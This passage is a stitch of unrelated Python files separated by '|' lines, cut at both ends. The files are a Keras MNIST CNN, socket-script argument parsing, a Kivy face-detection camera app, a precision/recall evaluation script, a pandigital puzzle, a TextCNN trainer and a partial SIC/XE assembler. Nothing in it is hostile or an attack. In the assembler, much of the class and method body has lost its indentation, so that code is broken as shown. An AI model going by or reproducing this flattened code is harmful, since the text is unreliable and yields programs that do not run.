# dense(128, relu) -> softmax over the 10 digit classes.
cnn = Sequential()
cnn.add(Conv2D(filters=32, kernel_size=3, padding="same", activation="relu", input_shape=[28, 28, 1]))
cnn.add(MaxPool2D(pool_size=2, strides=2, padding='valid'))
cnn.add(Conv2D(filters=32, kernel_size=3, padding="same", activation="relu"))
cnn.add(MaxPool2D(pool_size=2, strides=2, padding='valid'))
cnn.add(Flatten())
cnn.add(Dense(units=128, activation='relu'))
# Output layer: one probability per digit.
cnn.add(Dense(units=10, activation='softmax'))
cnn.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])
# Train for 10 epochs, validating against the test generator.
# NOTE(review): fit_generator() is deprecated in TF2-era Keras in favour of
# fit(); kept as-is for compatibility with the installed Keras version.
cnn.fit_generator(training_set,
                  steps_per_epoch = 64,
                  epochs = 10,
                  validation_data = test_set,
                  validation_steps = 64)
# Persist the trained network for later inference.
cnn.save('mnist.model')
|
import argparse
import logging
import os

# Command-line options shared by the socket client/server scripts.
parser = argparse.ArgumentParser(description='For Socket Connection')
parser.add_argument('--host', metavar='HOST', type=str, default='localhost', help='a string for a host address')
# FIX: help text said "a integer".
parser.add_argument('--port', metavar='PORT', type=int, default=9999, help='an integer for a port number')
parser.add_argument('--buff', metavar='BUFF', type=int, default=1024, help='a buffer size for a socket connection')
parser.add_argument('--path_home', metavar='PATH_HOME', type=str, default=os.getenv('HOME'), help='Path of the home directory')

# Module-level logger: everything from DEBUG up goes to stderr with
# "[LEVEL|file:line]" context.
logger = logging.getLogger('Socket Logger')
logger.setLevel(logging.DEBUG)  # severity order: DEBUG < INFO < WARNING < ERROR < CRITICAL
formatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s]: %(message)s')
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
def get_parser():
    """Parse sys.argv with the module-level parser and return the Namespace.

    NOTE(review): despite the name this returns the parsed arguments, not
    the parser object itself.
    """
    return parser.parse_args()
def get_logger():
    """Return the pre-configured module-level 'Socket Logger'."""
    return logger
|
from __future__ import print_function
from . import smile
def main():
    """Print the package's smile() output to stdout."""
    message = smile()
    print(message)
|
# coding:utf-8
import time
from kivy.app import App
from kivy.uix.image import Image
from kivy.clock import Clock
from kivy.graphics.texture import Texture
from kivy.uix.boxlayout import BoxLayout
import cv2
import pybind_example
# Haar cascade for frontal-face detection, loaded from OpenCV's bundled
# data directory.
cascPath = "haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + cascPath)
# Window length handed to pybind_example.rolling_stats over the FPS history.
WINDOW_SIZE = 10
class DetectLayout(BoxLayout):
    """Root layout holding the camera widget (id 'camera' in the kv file)."""

    def capture(self):
        """Save the current camera frame as a timestamped PNG file."""
        cam = self.ids['camera']
        stamp = time.strftime("%Y%m%d_%H%M%S")
        out_name = 'IMG_{}.png'.format(stamp)
        cam.export_to_png(out_name)
        print("Captured as {}".format(out_name))
class KivyCamera(Image):
    """Image widget that continuously displays webcam frames via OpenCV.

    Behaviour toggles read on every frame by update():
      detect     -- draw rectangles around detected faces
      green_mode -- zero the blue/red channels, leaving only green
    """

    def __init__(self, fps=30, **kwargs):
        super(KivyCamera, self).__init__(**kwargs)
        self.capture = cv2.VideoCapture(0)  # default webcam
        # FIX: `detect` and `green_mode` were read in update() but never
        # initialised anywhere in this file, so the first scheduled frame
        # raised AttributeError.  Defaults give a plain passthrough view;
        # TODO confirm against the .kv file in case it was meant to bind them.
        self.detect = False
        self.green_mode = False
        self.actual_fps = []  # initialise before the clock can fire
        Clock.schedule_interval(self.update, 1.0 / fps)

    def detect_faces(self, frame):
        """Draw a green box around each detected face (modifies frame in place)."""
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        faces = faceCascade.detectMultiScale(
            gray,
            scaleFactor=1.2,
            minNeighbors=5,
            minSize=(30, 30),
        )
        # Draw a rectangle around the faces
        for (x, y, w, h) in faces:
            cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
        return frame

    def frame_to_texture(self, frame):
        """Convert a BGR OpenCV frame into a Kivy texture."""
        flipped = cv2.flip(frame, 0)  # OpenCV rows are top-down, GL bottom-up
        # tobytes() replaces the deprecated tostring() alias (removed in
        # NumPy 2.0); the produced buffer is byte-identical.
        buf = flipped.tobytes()
        image_texture = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')
        image_texture.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')
        return image_texture

    def update_fps(self):
        """Record the current Clock FPS and refresh the displayed value."""
        self.actual_fps.append(Clock.get_fps())
        # Rolling statistics over the FPS history; the original code never
        # used the result, the call is kept for its (pybind11 demo) side.
        pybind_example.rolling_stats(self.actual_fps, WINDOW_SIZE)
        self.fps = str(self.actual_fps[-1])

    def update(self, dt):
        """Clock callback: grab a frame, post-process it, and display it."""
        ret, frame = self.capture.read()
        if not ret:  # camera unavailable or frame dropped
            return
        if self.detect:
            self.detect_faces(frame)
        if self.green_mode:
            frame[:, :, 2] = 0  # red channel (frame is BGR)
            frame[:, :, 0] = 0  # blue channel
        self.update_fps()
        # display image from the texture
        self.texture = self.frame_to_texture(frame)
class CamApp(App):
    """Kivy application wrapping the face-detection layout."""

    def build(self):
        # Keep a reference so on_stop() can reach the camera widget later.
        self.layout = DetectLayout()
        return self.layout

    def on_stop(self):
        # Release the OpenCV capture device; without this the webcam stays
        # open and the app may not exit even after the window is closed.
        self.layout.ids['camera'].capture.release()
if __name__ == '__main__':
    # Start the Kivy event loop when run as a script.
    CamApp().run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import ctypes
import glob
import os
import re
import sys
from multiprocessing import Array
from multiprocessing import Process
from multiprocessing import Queue
from os.path import basename
from os.path import exists
# FIX: matplotlib.use('Agg') was called AFTER `import matplotlib.pyplot`,
# at which point the default (possibly GUI) backend is already active and
# the call is ignored or warns on older matplotlib versions.  The backend
# must be selected before pyplot is first imported.
if 'linux' in sys.platform:
    import matplotlib
    matplotlib.use('Agg')  # headless rendering on Linux servers
import matplotlib.pyplot as plt
import numpy as np
import six
import cv2 as cv
from utils.evaluation import relax_precision
from utils.evaluation import relax_recall
# Command-line options.  Note: this module parses argv and allocates the
# shared arrays at import time.
parser = argparse.ArgumentParser()
parser.add_argument('--map_dir', type=str)     # directory of ground-truth .tif label maps
parser.add_argument('--result_dir', type=str)  # directory of predicted .npy score maps
parser.add_argument('--channel', type=int, default=3)
parser.add_argument('--offset', type=int, default=8)
parser.add_argument('--pad', type=int, default=24)  # (64 / 2) - (16 / 2)
parser.add_argument('--steps', type=int, default=256)  # number of score thresholds swept
parser.add_argument('--relax', type=int, default=3)    # relaxation passed to relax_precision/recall
parser.add_argument('--n_thread', type=int, default=8)
args = parser.parse_args()
print(args)
result_dir = args.result_dir
# The trailing "_<n>" of the result directory encodes the iteration number.
n_iter = int(result_dir.split('_')[-1])
label_dir = args.map_dir
result_fns = sorted(glob.glob('%s/*.npy' % result_dir))
n_results = len(result_fns)
eval_dir = '%s/evaluation_%d' % (result_dir, n_iter)
# Shared-memory accumulators shaped (n_results, channel, steps) so worker
# processes can fill per-image counts concurrently; each is a ctypes Array
# wrapped as a numpy view.
all_positive_base = Array(
    ctypes.c_double, n_results * args.channel * args.steps)
all_positive = np.ctypeslib.as_array(all_positive_base.get_obj())
all_positive = all_positive.reshape((n_results, args.channel, args.steps))
all_prec_tp_base = Array(
    ctypes.c_double, n_results * args.channel * args.steps)
all_prec_tp = np.ctypeslib.as_array(all_prec_tp_base.get_obj())
all_prec_tp = all_prec_tp.reshape((n_results, args.channel, args.steps))
all_true_base = Array(
    ctypes.c_double, n_results * args.channel * args.steps)
all_true = np.ctypeslib.as_array(all_true_base.get_obj())
all_true = all_true.reshape((n_results, args.channel, args.steps))
all_recall_tp_base = Array(
    ctypes.c_double, n_results * args.channel * args.steps)
all_recall_tp = np.ctypeslib.as_array(all_recall_tp_base.get_obj())
all_recall_tp = all_recall_tp.reshape((n_results, args.channel, args.steps))
def makedirs(dname):
    """Create *dname* (and missing parents) if it does not already exist.

    Uses exist_ok=True, which is race-free: the original exists()/makedirs()
    pair could crash when two worker processes created the same directory
    at the same time.
    """
    os.makedirs(dname, exist_ok=True)
def get_pre_rec(positive, prec_tp, true, recall_tp, steps):
    """Build the precision/recall curve and locate its break-even point.

    Returns (pre_rec, breakeven_pt): pre_rec is a (steps, 2) array of
    [precision, recall] rows, one per threshold; breakeven_pt is the
    candidate row whose precision and recall are closest to each other,
    or [0.0, 0.0] when no valid candidate exists.
    """
    curve = []
    candidates = []
    for t in range(steps):
        # True positives can never exceed predicted/actual positives.
        if positive[t] < prec_tp[t] or true[t] < recall_tp[t]:
            sys.exit('calculation is wrong')
        precision = float(prec_tp[t]) / positive[t] if positive[t] > 0 else 0
        recall = float(recall_tp[t]) / true[t] if true[t] > 0 else 0
        curve.append([precision, recall])
        # Degenerate 0/1 values are excluded from break-even candidates.
        if 0 < precision < 1 and 0 < recall < 1:
            candidates.append([precision, recall])
    curve = np.asarray(curve)
    if candidates:
        candidates = np.asarray(candidates)
        best = np.abs(candidates[:, 0] - candidates[:, 1]).argmin()
        breakeven_pt = candidates[best]
    else:
        breakeven_pt = [0.0, 0.0]
    return curve, breakeven_pt
def draw_pre_rec_curve(pre_rec, breakeven_pt):
    """Plot a precision/recall curve into matplotlib's current figure.

    `pre_rec` is an (N, 2) array of [precision, recall]; `breakeven_pt`
    is marked with an 'x' and reported in the legend.  The caller is
    responsible for saving (plt.savefig) afterwards.
    """
    plt.clf()  # the single global figure is reused across calls
    plt.plot(pre_rec[:, 0], pre_rec[:, 1])
    plt.plot(breakeven_pt[0], breakeven_pt[1],
             'x', label='breakeven recall: %f' % (breakeven_pt[1]))
    plt.ylabel('recall')
    plt.xlabel('precision')
    # Leave headroom above 1.0 so the curve endpoints stay visible.
    plt.ylim([0.0, 1.1])
    plt.xlim([0.0, 1.1])
    plt.legend(loc='lower left')
    plt.grid(linestyle='--')
def worker_thread(result_fn_queue):
    """Consume (index, prediction-file) pairs until a (None, None) sentinel.

    For each prediction file: load the matching label map, accumulate
    relaxed precision/recall counts per channel and threshold into row `i`
    of the shared all_* arrays, and write per-image PR curves and images
    under eval_dir/<img_id>/.
    """
    while True:
        i, result_fn = result_fn_queue.get()
        if result_fn is None:  # sentinel -> shut this worker down
            break
        # Recover the image id from file names like ".../pred_<id>.npy".
        img_id = basename(result_fn).split('pred_')[-1]
        img_id, _ = os.path.splitext(img_id)
        if '.' in img_id:
            img_id = img_id.split('.')[0]
        if len(re.findall('_', img_id)) > 1:
            img_id = '_'.join(img_id.split('_')[1:])
        out_dir = '%s/%s' % (eval_dir, img_id)
        makedirs(out_dir)
        print(img_id)
        label = cv.imread('%s/%s.tif' %
                          (label_dir, img_id), cv.IMREAD_GRAYSCALE)
        pred = np.load(result_fn)
        # Crop the label so it aligns with the padded/offset prediction.
        # NOTE(review): the "- 1" looks like a one-off alignment tweak --
        # confirm against the prediction-generation script.
        label = label[args.pad + args.offset - 1:
                      args.pad + args.offset - 1 + pred.shape[0],
                      args.pad + args.offset - 1:
                      args.pad + args.offset - 1 + pred.shape[1]]
        # "* 125" presumably stretches small class ids into a visible
        # grayscale range for inspection.
        cv.imwrite('%s/label_%s.png' % (out_dir, img_id), label * 125)
        print('pred_shape:', pred.shape)
        for c in six.moves.range(args.channel):
            for t in six.moves.range(0, args.steps):
                # Sweep thresholds 0, 1/steps, 2/steps, ...
                threshold = 1.0 / args.steps * t
                pred_vals = np.array(
                    pred[:, :, c] >= threshold, dtype=np.int32)
                label_vals = np.array(label, dtype=np.int32)
                if args.channel > 1:
                    # Multi-class labels: evaluate channel c one-vs-rest.
                    label_vals = np.array(label == c, dtype=np.int32)
                all_positive[i, c, t] = np.sum(pred_vals)
                all_prec_tp[i, c, t] = relax_precision(
                    pred_vals, label_vals, args.relax)
                all_true[i, c, t] = np.sum(label_vals)
                all_recall_tp[i, c, t] = relax_recall(
                    pred_vals, label_vals, args.relax)
            # Per-image, per-channel PR curve and artifacts.
            pre_rec, breakeven_pt = get_pre_rec(
                all_positive[i, c], all_prec_tp[i, c],
                all_true[i, c], all_recall_tp[i, c], args.steps)
            draw_pre_rec_curve(pre_rec, breakeven_pt)
            plt.savefig('%s/pr_curve_%d.png' % (out_dir, c))
            np.save('%s/pre_rec_%d' % (out_dir, c), pre_rec)
            cv.imwrite('%s/pred_%d.png' % (out_dir, c), pred[:, :, c] * 255)
            print(img_id, c, breakeven_pt)
    print('thread finished')
if __name__ == '__main__':
    # Fan the prediction files out to n_thread worker processes.
    result_fn_queue = Queue()
    workers = [Process(target=worker_thread,
                       args=(result_fn_queue,)) for i in range(args.n_thread)]
    for w in workers:
        w.start()
    [result_fn_queue.put((i, fn)) for i, fn in enumerate(result_fns)]
    # One (None, None) sentinel per worker so every process terminates.
    [result_fn_queue.put((None, None)) for _ in range(args.n_thread)]
    for w in workers:
        w.join()
    print('all finished')
    # Collapse the per-image counts, then plot one dataset-level PR curve
    # per channel.
    all_positive = np.sum(all_positive, axis=0)
    all_prec_tp = np.sum(all_prec_tp, axis=0)
    all_true = np.sum(all_true, axis=0)
    all_recall_tp = np.sum(all_recall_tp, axis=0)
    for c in six.moves.range(args.channel):
        pre_rec, breakeven_pt = get_pre_rec(
            all_positive[c], all_prec_tp[c],
            all_true[c], all_recall_tp[c], args.steps)
        draw_pre_rec_curve(pre_rec, breakeven_pt)
        plt.savefig('%s/pr_curve_%d.png' % (eval_dir, c))
        np.save('%s/pre_rec_%d' % (eval_dir, c), pre_rec)
        print(breakeven_pt)
|
import itertools

# All 1-9 pandigital strings kept in a set: the original stored them in a
# list, so every `in` test scanned up to 9! = 362880 entries; set membership
# is O(1).
_PANDIGITALS = frozenset(map("".join, itertools.permutations("123456789")))

def doubled_pandigital_pairs():
    """Return every (a, 2a) pair with 1000 <= a <= 9998 whose decimal
    concatenation str(a) + str(2a) uses each digit 1-9 exactly once."""
    pairs = []
    for a in range(1000, 9999):
        b = a * 2
        if str(a) + str(b) in _PANDIGITALS:
            pairs.append((a, b))
    return pairs

for a, b in doubled_pandigital_pairs():
    print(a, b)
|
import os
import sys
import time
import argparse
import torch
import numpy as np
from torchtext import data
from torchtext import vocab
#from tensorboardX import SummaryWriter
import model
import TrainModel
import DatasetPreprocess
# Command-line configuration, dataset preparation and training entry point
# for the TextCNN classifier.
parser = argparse.ArgumentParser(description='TextCNN text classifier')
# Model hyper parameters.
# FIX: several help strings below advertised defaults that contradicted the
# actual `default=` values (lr, embeddingDim, datasetDir, device).
parser.add_argument('-lr', type=float, default=0.1, help='initial learning rate [default: 0.1]')
parser.add_argument('-epochs', type=int, default=256, help='number of epochs for train [default: 256]')
parser.add_argument('-trainBatchSize', type=int, default=128, help='batch size for training [default: 128]')
parser.add_argument('-dropout', type=float, default=0.5, help='the probability for dropout [default: 0.5]')
parser.add_argument('-maxNorm', type=float, default=3.0, help='l2 constraint of parameters [default: 3.0]')
parser.add_argument('-embeddingDim', type=int, default=300, help='number of embedding dimension [default: 300]')
parser.add_argument('-filterNum', type=int, default=100, help='number of each size of filter')
parser.add_argument('-filterSizes', type=str, default='3,4,5', help='comma-separated filter sizes to use for convolution')
parser.add_argument('-earlyStopping', type=int, default=1000, help='iteration numbers to stop without performance increasing')
# Word embedding parameters.
# NOTE(review): argparse's type=bool treats any non-empty string as True,
# so "-static False" still yields True; consider action='store_true'.
parser.add_argument('-static', type=bool, default=True, help='whether to use static pre-trained word vectors')
parser.add_argument('-fineTuneWordEm', type=bool, default=False, help='whether to fine-tune static pre-trained word vectors')
parser.add_argument('-multichannel', type=bool, default=False, help='whether to use 2 channel of word vectors')
parser.add_argument('-logInterval', type=int, default=1, help='how many steps to wait before logging training status [default: 1]')
parser.add_argument('-valInterval', type=int, default=100, help='how many steps to wait before testing [default: 100]')
# Directories.
parser.add_argument('-datasetDir', type=str, default='data/cnews/5_100', help='Directory of dataset [default: data/cnews/5_100]')
parser.add_argument('-pretrainedEmbeddingName', type=str, default='sgns.sogounews.bigram-char', help='filename of pre-trained word vectors')
parser.add_argument('-pretrainedEmbeddingPath', type=str, default='./pretrainedW2v', help='path of pre-trained word vectors')
parser.add_argument('-modelSaveDir', type=str, default='modelSaveDir', help='where to save the modelsavedir')
parser.add_argument('-modelSaveBest', type=bool, default=True, help='whether to save when get best performance')
parser.add_argument('-modelLoadFilename', type=str, default=None, help='filename of model loading [default: None]')
# Device.
parser.add_argument('-device', type=int, default=0, help='device to use for iterate data, -1 mean cpu [default: 0]')
args = parser.parse_args()

### Process the dataset.
print('Processing dataset start...')
TEXT = data.Field()
LABEL = data.Field(sequential=False)
# NOTE(review): device is hard-coded to -1 (CPU) for the iterators even
# though args.device defaults to 0 -- confirm whether this is intentional.
train_iter, dev_iter, test_iter = DatasetPreprocess.GetIterator(TEXT, LABEL, args.datasetDir, args, device = -1, repeat = False, shuffle = True)
print('Processing data done!')

### Derive model parameters from the built vocabularies.
args.embeddingNum = len(TEXT.vocab)
# len(LABEL.vocab) would be one larger than the real number of classes
# because of the <unk> entry (e.g. 6 for 5 labels), so use the raw counts.
args.classNum = len(LABEL.vocab.freqs)
print('args.embeddingNum = ', args.embeddingNum)
print('args.classNum = ', args.classNum)
print('LABEL.vocab = ', LABEL.vocab.freqs)
args.cuda = args.device != -1 and torch.cuda.is_available()
args.filterSizes = [int(size) for size in args.filterSizes.split(',')]
if args.static:
    # With pre-trained vectors the embedding size is dictated by the
    # vectors themselves (TEXT.vocab.vectors is [vocab_size, dim]).
    args.embeddingDim = TEXT.vocab.vectors.size()[-1]
    args.vectors = TEXT.vocab.vectors
if args.multichannel:
    args.static = True
    args.nonStatic = True

### Print the effective configuration (vectors are too large to dump).
print('Parameters:')
for attr, value in sorted(args.__dict__.items()):
    if attr in {'vectors'}:
        continue
    print('\t{}={}'.format(attr.upper(), value))

### Build, optionally restore, and train the model.
textCNN = model.TextCNN(args)
if args.modelLoadFilename:
    print('\nLoading model from {}...\n'.format(args.modelLoadFilename))
    textCNN.load_state_dict(torch.load(args.modelLoadFilename))
if args.cuda:
    torch.cuda.set_device(args.device)
    textCNN = textCNN.cuda()
try:
    TrainModel.train(train_iter, dev_iter, textCNN, args)
except KeyboardInterrupt:
    print('\nTraining CANCEL! \nExiting from training')
|
#!/usr/bin/python3
import sys
import os
import re
import math
# SIC/XE opcode table: mnemonic -> [operand type ('m'=memory, 'r'=two
# registers, 'r1'=one register, 'r/n'=register+count, 'n'=number,
# None=no operands), operand count, instruction format ('1'/'2'/'3'),
# opcode as a hex string].
opcode_table = {'add':['m', 1,'3', '18'],
'addf':['m', 1, '3', '58'],
'addr':['r', 2, '2', '90'],
'and':['m', 1,'3', '40'],
'clear':['r1', 1, '2', 'B4'],
'comp':['m',1,'3', '28'],
'compf':['m',1,'3', '88'],
'compr':['r',2,'2','A0'],
'div':['m',1,'3','24'],
'divf':['m',1,'3','64'],
'divr':['r',2,'2','9C'],
'fix':[None,0,'1','C4'],
'float':[None,0,'1','C0'],
'hio':[None,0,'1','F4'],
'j':['m',1,'3','3C'],
'jeq':['m',1,'3','30'],
'jgt':['m',1,'3','34'],
'jlt':['m',1,'3','38'],
'jsub':['m',1,'3','48'],
'lda':['m',1,'3','00'],
'ldb':['m',1,'3','68'],
'ldch':['m',1,'3','50'],
'ldf':['m',1,'3','70'],
'ldl':['m',1,'3','08'],
'lds':['m',1,'3','6C'],
'ldt':['m',1,'3','74'],
'ldx':['m',1,'3','04'],
'lps':['m',1,'3','D0'],
'mul':['m',1,'3','20'],
'mulf':['m',1,'3','60'],
'mulr':['r',2,'2','98'],
'norm':[None,0,'1','C8'],
'or':['m',1,'3','44'],
'rd':['m',1,'3','D8'],
'rmo':['r',2,'2','AC'],
'rsub':[None,0,'3','4C'],
'shiftl':['r/n',2,'2','A4'],
'shiftr':['r/n',2,'2','A8'],
'sio':[None,0,'1','F0'],
'ssk':['m',1,'3','EC'],
'sta':['m',1,'3','0C'],
'stb':['m',1,'3','78'],
'stch':['m',1,'3','54'],
'stf':['m',1,'3', '80'],
'sti':['m',1,'3','D4'],
'stl':['m',1,'3','14'],
'sts':['m',1,'3','7C'],
'stsw':['m',1,'3','E8'],
'stt':['m',1,'3','84'],
'stx':['m',1,'3','10'],
'sub':['m',1,'3','1C'],
'subf':['m',1,'3','5C'],
'subr':['r',2,'2','94'],
'svc':['n',1,'2','B0'],
'td':['m',1,'3','E0'],
'tio':[None,0, '1', 'F8'],
'tix':['m',1, '3', '2C'],
'tixr':['r1',1, '2', 'B8'],
'wd':['m',1, '3', 'DC']}
# types of operands: m (memory), r (two registers), r1 (one register),
# r/n (register + shift count), n (number), None (no operands)
# number of operands: 0, 1, 2
registers = ['a','x', 'l', 'pc', 'sw', 'b', 's', 't', 'f']
all_objCode = []  # accumulated object-code strings
# SIC/XE register numbers, positionally aligned with `registers`:
# a=0, x=1, l=2, pc=8, sw=9, b=3, s=4, t=5, f=6
reg_nums = [0, 1, 2, 8, 9, 3, 4, 5, 6]
directives = ['end', 'nobase', 'base', 'start', 'resw', 'resb', 'byte', 'word']
sym_tab = {}          # symbol -> address
symbols_undef = []    # symbols referenced but never defined
line_lst = []
# Held in a list so it can be mutated across functions; element [1] is
# presumably the current BASE symbol once base addressing is enabled
# (assemble() reads based_holder[1]) -- confirm in the directive handling.
based_holder = [False]
# based = False
#### NOTES #####
# to convert from hex, do int('hex_num', 16)
# to convert to hex, do hex(int_num)
###############
class Line:
''' A class for each line read from the input source code '''
#constructor
def __init__(self, orig, line_num, pc_ctr, label=None,mnemonic=None,comment=None, optype=None,
operand1=None, operand2=None, immediate=False, indirect=False, indexed=False,
extended=False, based=False, format_inst=None):
self.orig = orig
self.label = label
self.mnemonic = mnemonic
self.line_num = line_num
self.pc_ctr = pc_ctr
self.optype = optype
self.operand1 = operand1
self.operand2 = operand2
self.immediate = immediate
self.indirect = indirect
self._format = format_inst
self.indexed = indexed
self.extended = extended
self.based = based
self.comment = comment
    def __str__(self):
        # Printable form is simply the unmodified source text.
        return self.orig
def assemble(self):
''' returns generated machine code for instruction '''
if self._format == 1:
return opcode_table[self.mnemonic][3]
elif self._format == 2:
if self.optype == 'r':
return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + str(reg_nums[registers.index(self.operand2.lower())])
elif self.optype == 'r1':
return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + '0'
elif self.optype == 'n':
return opcode_table[self.mnemonic][3] + hex(int(self.operand1))[-1].upper() + '0'
else:
return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + hex(int(self.operand2) - 1)[-1].upper()
elif self._format == 3:
# order of addressing: extended(if + is provided), then based(if base directive provided), then direct, then pc-relative, then sic
# for based: 0 <= disp <= 4095
# for pc-relative: -2048 <= disp <= 2047
opc = opcode_table[self.mnemonic][3]
opc_orig = opc
if self.mnemonic == 'rsub':
return '4F0000'
if self.operand1 in symbols_undef:
print("Undefined symbol: " + self.operand1 + ' in line ' + self.line_num)
sys.exit(1)
loc = hex(sym_tab[self.operand1])
assembled = False
#based
if self.based:
baseloc = None
if based_holder[1] in sym_tab:
baseloc = sym_tab[based_holder[1]]
disp = int(loc, 16) - baseloc
if 0 <= disp <= 4095:
assembled = True
disp = hex(disp)[hex(disp).index('x')+1:]
if len(disp) < 3:
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + 'C' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
else:
print("Illegal base directive: " + based_holder[1])
sys.exit(1)
opc = opc_orig
# direct
if len(loc[loc.index('x') + 1:]) <= 3 and assembled is False:
assembled = True
disp = loc[loc.index('x') + 1:]
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '8' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
opc = opc_orig
#pc-relative
if assembled is False:
disp = int(loc, 16) - (self.pc_ctr)
if -2048 <= disp <= 2047:
assembled = True
if disp < 0:
disp = 4096 + disp
disp = hex(disp)[hex(disp).index('x')+1:]
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + 'A' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
opc = opc_orig
#sic
if assembled is False:
disp = loc[loc.index('x')+1:]
if int(disp, 16) <= int('7fff', 16):
assembled = True
if self.indexed:
disp = hex(int('8000', 16) + int(disp, 16))
disp = disp[disp.index('x')+1:]
while len(disp) < 4:
disp = '0' + disp
return opc + disp
if not assembled:
print('Memory address too large. Try using extended format in line ' + self.line_num)
sys.exit(1)
elif self._format == 4:
opc = opcode_table[self.mnemonic][3]
loc = hex(sym_tab[self.operand1])
disp = loc[loc.index('x')+1:]
if int(disp, 16) <= int('fffff', 16):
while len(disp) < 5:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '9' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
else:
print('Memory address too large for extended format: Line ' + self.line_num)
sys.exit(1)
return "Not yet done"
def parse_asm(line, ctr, linectr):
    ''' Pass 1: parse one source line.

    Updates the module-level symbol table (sym_tab), undefined-symbol
    list, base-directive state and line_lst, and returns a tuple
    (new_location_counter, end_directive_seen, new_line_counter).
    Exits the process on any syntax error.
    '''
    if ctr > int('fffff', 16):
        print('Instruction ends beyond maximum memory address for SIC/XE: Line ' + str(linectr))
        sys.exit(1)
    line = untabify(line)
    orig = line
    # columns 41+ are always treated as the comment field
    line, comment_ = orig[:40], orig[40:]
    label_ = None
    mnemonic = None
    operand1 = None
    operand2 = None
    format_instr = None
    ext = False
    imm = False
    indexed = False
    indirect = False
    optype = None
    # a full-line comment starts with '.'
    FullCommentRe = re.compile(r'^\s*\.+(?P<fullcomment>.*)$')
    comment_search = FullCommentRe.search(line)
    if comment_search:
        comment_ = comment_search.group('fullcomment')
        line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
            operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
        linectr += 1
        return (ctr, False, linectr)
    # optional "label:" prefix
    LabelRe = re.compile(r'^\s*(?P<label>[a-z0-9_]*)\s*:', re.IGNORECASE)
    label_search = LabelRe.search(line)
    if label_search:
        label_ = label_search.group('label').lower()
        if label_ in registers:
            print('Register used where label expected in line ' + str(linectr))
            sys.exit(1)
        line = line[line.index(':')+1:]
        if label_search.group('label').lower() in sym_tab:
            print('Error: Line ' + str(linectr) + ', Symbol redefinition: ', label_search.group('label').lower())
            sys.exit(1)
        if label_search.group('label')[0].isnumeric():
            if not label_search.group('label').isnumeric():
                print('Extraneous characters in line ' + str(linectr))
                sys.exit(1)
        sym_tab[label_search.group('label').lower()] = ctr
        if label_search.group('label').lower() in symbols_undef:
            symbols_undef.remove(label_search.group('label').lower())
    else:
        # a ':' without a valid label (and not inside a quoted literal)
        if ':' in line and line.count('\'') < 2:
            temp_label = line[:line.index(':')]
            if temp_label[0].isalpha() is False:
                print('Label must start with letters. Error in line ' + str(linectr))
                print(orig)
                sys.exit(1)
    # label-only / blank line
    if line.isspace() or line == '':
        line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
            operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
        linectr += 1
        return (ctr, False, linectr)
    # mnemonic (optionally '+'-prefixed for extended format)
    MnemonicRe = re.compile(r'\s*(?P<mnemonic>\+*[a-z]+)\s*', re.IGNORECASE)
    mnemonic_search = MnemonicRe.search(line)
    curr_mnemonic = None
    if mnemonic_search:
        curr_mnemonic = mnemonic_search.group('mnemonic').lower()
